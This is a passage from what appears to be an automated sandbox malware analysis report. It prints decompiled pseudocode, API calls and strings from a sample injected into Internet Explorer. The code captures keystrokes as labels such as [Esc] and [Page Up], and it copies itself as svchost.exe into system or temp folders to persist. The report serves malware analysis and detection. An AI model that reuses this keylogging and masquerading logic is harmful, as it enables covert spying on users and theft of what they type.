				asm("enter 0x2600, 0x5b");
				asm("enter 0x3700, 0x5b");
				asm("enter 0x4800, 0x5b");
				asm("enter 0x5900, 0x5b");
				asm("enter 0x6a00, 0x5b");
				asm("enter 0x7b00, 0x5b");
				asm("enter 0x8c00, 0x5b");
				asm("enter 0x9d00, 0x5b");
				asm("enter 0xae00, 0x5b");
				asm("enter 0xbf00, 0x5b");
				asm("enter 0xd000, 0x5b");
				asm("enter 0xe100, 0x5b");
				asm("enter 0xf200, 0x5b");
				asm("enter 0x300, 0x5c");
				asm("enter 0x1400, 0x5c");
				asm("enter 0x2500, 0x5c");
				asm("enter 0x3600, 0x5c");
				asm("enter 0x4700, 0x5c");
				asm("enter 0x5800, 0x5c");
				asm("enter 0x6900, 0x5c");
				asm("enter 0x7a00, 0x5c");
				asm("enter 0x8b00, 0x5c");
				asm("enter 0x9c00, 0x5c");
				asm("enter 0xad00, 0x5c");
				asm("enter 0xbe00, 0x5c");
				asm("enter 0xcf00, 0x5c");
				asm("enter 0xe000, 0x5c");
				asm("enter 0xf100, 0x5c");
				asm("enter 0x200, 0x5d");
				asm("enter 0x1300, 0x5d");
				asm("enter 0x2400, 0x5d");
				asm("enter 0x3500, 0x5d");
				asm("enter 0x4600, 0x5d");
				asm("enter 0x5700, 0x5d");
				asm("enter 0x6800, 0x5d");
				asm("enter 0x7600, 0x5d");
				asm("enter 0x8400, 0x5d");
				asm("enter 0x9200, 0x5d");
				asm("enter 0xa000, 0x5d");
				asm("enter 0xae00, 0x5d");
				asm("enter 0xbc00, 0x5d");
				asm("enter 0xca00, 0x5d");
				asm("enter 0xd800, 0x5d");
				asm("enter 0xe600, 0x5d");
				asm("enter 0x8b00, 0xc7");
				E00C81BB4(_t131, L"[Numpad +]");
				if(E00C81D04( *_t131) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *_t131) > 0 && E00C81F1C(L"Numpad",  *_t131) <= 0) {
					_t98 = 1;
					E00C81BB4(_t131, L"KeyDelBackspace");
				}
				 *((char*)(_t148 - 5)) = E00C854EC();
				_t141 = ToUnicodeEx( *(_t148 - 2) & 0x0000ffff,  *(_t148 - 4) & 0x0000ffff, _t148 - 0x105, _t148 - 0x310, 0x100, 0,  *(_t148 + 0xc));
				if(_t141 <= 0) {
					__eflags = _t141;
					if(_t141 < 0) {
						 *0xc8deec =  *(_t148 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t148 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t148 - 0x105, 0x40 << 2);
						_t131 = _t131;
						_t143 = _t141;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t143;
						if(_t143 < 0) {
							do {
								_t69 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t148 - 0x410, _t148 - 0x310, 0x100, 0,  *(_t148 + 0xc));
								__eflags = _t69;
							} while (_t69 < 0);
						}
					}
				} else {
					memcpy(_t148 - 0x210, 0xc8deec, 0x42 << 2);
					_t131 = _t131;
					if(E00C81D04( *_t131) == 0) {
						E00C81CD8(_t131, 0x80, _t148 - 0x310);
						_t162 =  *((char*)(_t148 - 5));
						if( *((char*)(_t148 - 5)) != 0) {
							E00C85148( *_t131, _t98, 0x80, _t148 - 0x418, _t131, 0xc8deec, __eflags);
							E00C81BB4(_t131,  *((intOrPtr*)(_t148 - 0x418)));
						} else {
							E00C850CC( *_t131, _t98, 0x80, _t148 - 0x414, _t131, 0xc8deec, _t162);
							E00C81BB4(_t131,  *((intOrPtr*)(_t148 - 0x414)));
						}
					}
					_t73 =  *(_t148 - 0x210);
					if(_t73 != 0) {
						ToUnicodeEx(_t73,  *(_t148 - 0x20c), _t148 - 0x208, _t148 - 0x310, 0x100, 0,  *(_t148 + 0xc));
					}
					E00C8291C();
				}
				if(_t98 == 1) {
					E00C81B78(_t131);
				}
				_pop(_t113);
				 *[fs:eax] = _t113;
				_push(E00C85FC6);
				return E00C81B90(_t148 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Numpad +], xrefs: 00C8583C

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C84914, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180

C-Code - Quality: 77%

			E00C84914(void* __eax, intOrPtr __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v1520;
				char _v1542;
				char _v1564;
				char _v1566;
				void _v6176;
				char _v6180;
				char _v6184;
				intOrPtr _t29;
				void* _t35;
				void* _t39;
				int _t45;
				void* _t55;
				int _t61;
				intOrPtr _t85;
				void* _t87;
				intOrPtr _t102;
				void* _t106;
				WCHAR* _t131;
				void* _t134;

				_t101 = __edx;
				_t85 = __ebx;
				_push(__eax);
				_push(__ebx);
				_v6184 = 0;
				_v6180 = 0;
				_t131 = memcpy( &_v6176, __edx, 0x607 << 2);
				_push(_t134);
				_push(0xc84b74);
				_push( *[fs:eax]);
				 *[fs:eax] = _t134 + 0xffffffffffffe7ec;
				if(_v1566 == 0) {
					L26:
					_pop(_t102);
					 *[fs:eax] = _t102;
					_push(E00C84B7B);
					return E00C81770( &_v6184, 2);
				} else {
					_t29 = _v1520;
					if(_t29 != 0) {
						__eflags = _t29 - 1;
						if(_t29 != 1) {
							__eflags = _t29 - 2;
							if(_t29 != 2) {
								__eflags = _t29 - 3;
								if(_t29 != 3) {
									__eflags = _t29 - 4;
									if(__eflags != 0) {
										__eflags = _t29 - 5;
										if(_t29 == 5) {
											_t85 = E00C82FE0();
										}
									} else {
										_t85 = E00C833A8(E00C8310C(), E00C84B84, __eflags);
									}
								} else {
									__eflags = E00C83100();
									if(__eflags == 0) {
										_t85 = E00C833A8(E00C8310C(), E00C84B84, __eflags);
									} else {
										_t85 = E00C833A8(E00C83100(), E00C84B84, __eflags);
									}
								}
							} else {
								_t85 = E00C83060(_t101);
							}
						} else {
							E00C83034();
							_t85 = _t29;
						}
					} else {
						_t85 = E00C83008();
					}
					E00C81970( &_v6180, 0xb,  &_v1542);
					_t140 = _v6180;
					if(_v6180 != 0) {
						_t85 = E00C833A8(E00C833A8(_t85,  &_v1542, _t140), E00C84B84, _t140);
					}
					_push(E00C833A8(_t85,  &_v1564, _t140));
					_t35 = E00C82E48(_t131);
					_pop(_t106);
					if(E00C83960(_t131, _t35 + _t35, _t106) != 1) {
						_t39 = E00C834C4(_t85);
						_t142 = _t39;
						if(_t39 != 0) {
							SetFileAttributesW(E00C833A8(_t85,  &_v1564, _t142), 0x80);
							_t45 = CopyFileW(_t131, E00C833A8(_t85,  &_v1564, _t142), 0);
							asm("sbb eax, eax");
							_t144 = _t45 + 1;
							if(_t45 + 1 != 0) {
								E00C833A8(_t85,  &_v1564, __eflags);
							} else {
								_t87 = E00C833A8(E00C8310C(), E00C84B84, _t144);
								E00C81970( &_v6184, 0xb,  &_v1542);
								_t145 = _v6184;
								if(_v6184 != 0) {
									_t87 = E00C833A8(E00C833A8(_t87,  &_v1542, _t145), E00C84B84, _t145);
								}
								_t55 = E00C834C4(_t87);
								_t146 = _t55;
								if(_t55 != 0) {
									SetFileAttributesW(E00C833A8(_t87,  &_v1564, _t146), 0x80);
									_t61 = CopyFileW(_t131, E00C833A8(_t87,  &_v1564, _t146), 0);
									asm("sbb eax, eax");
									_t148 = _t61 + 1;
									if(_t61 + 1 != 0) {
										E00C833A8(_t87,  &_v1564, _t148);
									}
								}
							}
						}
					}
					goto L26;
				}
			}

APIs

SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000080), ref: 00C84B11

Part of subcall function 00C83060: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,svchost.exe,00000000,00C8498E,00000000,00C84B74,?,00C8E07C,00000000,00000000), ref: 00C83077

Part of subcall function 00C83034: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00C83044

CopyFileW.KERNEL32(svchost.exe,00000000,00000000), ref: 00C84B27

Part of subcall function 00C82FE0: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C849F0,00000000,00C84B74,?,00C8E07C,00000000,00000000), ref: 00C82FEF
Part of subcall function 00C82FE0: GetTempPathW.KERNEL32(00000104,00000000), ref: 00C82FFC

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Part of subcall function 00C834C4: lstrlenW.KERNEL32(00000000), ref: 00C834EB
Part of subcall function 00C834C4: CreateDirectoryW.KERNEL32(?,00000000,00000000), ref: 00C83583

SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00C84A79
CopyFileW.KERNEL32(svchost.exe,00000000,00000000), ref: 00C84A8F

Part of subcall function 00C83008: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00C83018

Strings

svchost.exe, xrefs: 00C8491D, 00C84A8E, 00C84B26

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85A9E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A9E(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F1]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[F1], xrefs: 00C85AA0
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85D57, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D57(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Page Up]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Page Up], xrefs: 00C85D59

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85A8D, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A8D(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[End]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[End], xrefs: 00C85A8F

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C8587E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8587E(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Esc]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

